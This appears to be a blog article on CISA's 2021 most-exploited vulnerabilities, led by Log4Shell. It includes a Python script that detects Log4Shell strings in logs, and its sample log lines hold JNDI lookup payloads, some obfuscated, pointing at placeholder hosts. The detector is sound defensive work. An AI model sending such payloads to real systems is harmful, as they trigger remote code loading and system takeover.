Many top vulnerabilities are in software libraries that have been used for years. Observability offers a better way (vs. traditional security approaches) to find and protect against them.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released its 2021 report outlining the most exploited vulnerabilities for that year. The findings highlight the need for more proactive, more sophisticated security approaches based on artificial intelligence and more.
Number one on the list is a vulnerability in the very widely used Apache Log4j logging library. Known as Log4Shell, it is most commonly exploited with a specially crafted string that, once logged, lets threat actors take over entire systems.
The vulnerability in Apache’s Log4j software library should be a main reason to adopt observability. According to CISA, “Log4j is very broadly used in a variety of consumer and enterprise services, websites, and applications—as well as in operational technology products—to log security and performance information.”
See also: Log4j Vulnerability Highlights the Need for Observability
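The observability argument above is concrete: if the logs that Log4j writes (or the web-server access logs in front of it) are already collected, the "specially crafted string" can be found in them. The following is an added example, not code from the article or from CISA, of a small detector run over constructed access-log lines. It assumes the well-known Log4Shell payload shape, a JNDI lookup of the form `${jndi:scheme:target}` placed in any logged field, and a few common obfuscations (nested `${lower:..}` and `${upper:..}` lookups, the `${...:-default}` default-value trick, and URL encoding). The sample lines, client addresses and `example.invalid` hosts are all constructed.

```python
"""Find Log4Shell-style JNDI lookup strings in log lines.

Added example for this article; it is not the article's or CISA's code.
Assumptions: payloads look like ${jndi:<scheme>:<target>} and may be hidden
with nested ${lower:..}/${upper:..} lookups, ${..:-default} lookups, or URL
encoding. The log lines below are constructed for the demonstration.
"""
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines. Lines 2, 3, 4 and 6 carry a
# lookup (plain, lower-cased pieces, default-value pieces, URL-encoded); line 5
# contains a harmless ${date:...} lookup that a naive "${" match would flag.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:rmi}://example.invalid/b}"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"',
    '203.0.113.13 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=price%20${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.15 - - [10/Dec/2021:12:00:06 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fd%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

# Each pattern matches only an innermost lookup (no nested "${" inside it), so
# normalize() peels one layer per round until nothing changes.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${x:-y} and ${::-y} -> y
_JNDI = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookup obfuscation to its plain form."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so a pathological line cannot spin
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line: str) -> list[tuple[str, str]]:
    """Return (scheme, target) for every JNDI lookup found after normalizing."""
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI.finditer(normalize(line))]


def scan_log_lines(lines: list[str]) -> list[dict]:
    """Scan access-log lines; one finding per lookup with line number and client."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        client = line.split(" ", 1)[0]  # first field of a combined-format line
        for scheme, target in find_jndi_lookups(line):
            findings.append({"line": lineno, "client": client,
                             "scheme": scheme, "target": target})
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: {f['client']} sent {f['scheme']} lookup -> {f['target']}")
```

Matching on the normalized `${jndi:` form rather than on any `${` keeps legitimate lookups such as `${date:yyyy}` out of the alert stream, which is the difference between a signal an on-call team will act on and one they will mute. The same function can be pointed at application logs, proxy logs or a SIEM export; the lookup is found wherever the string was logged.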
Other notable vulnerabilities include ProxyShell and ProxyLogon, which affect Microsoft Exchange Server. Both allow threat actors to escalate privileges and eventually take over mailboxes, files, and other resources that require credentials.
Some vulnerabilities from 2020, such as ZeroLogon, show that companies remain exposed when they use products no longer supported by vendors or fall behind on updates to their systems.
Companies must act proactively to stay ahead of vulnerabilities. Proof-of-concept code typically appears within two weeks of disclosure, which sets the baseline reaction time for companies affected by these attacks. CISA therefore recommends comprehensive security measures such as updating end-of-life software and enforcing identity and access management policies, and it also recommends segmenting networks to limit the attack surface.
Internet-facing systems are a particular concern
This year’s report found that cyber threat actors routinely targeted internet-facing systems such as email servers or virtual private network (VPN) servers. The rise of remote and distributed workforces should make this a concern for companies and enterprises in the throes of changing how and where their workforce performs company tasks.
For most of the vulnerabilities, threat actors released proof-of-concept code within mere weeks. The quick release of this code gave a broader range of threat actors the tools they needed to hit companies again.
Nine of the 15 vulnerabilities are remote code execution vulnerabilities. These flaws allow threat actors to take over systems remotely and, once inside, gain access to wide swaths of the network.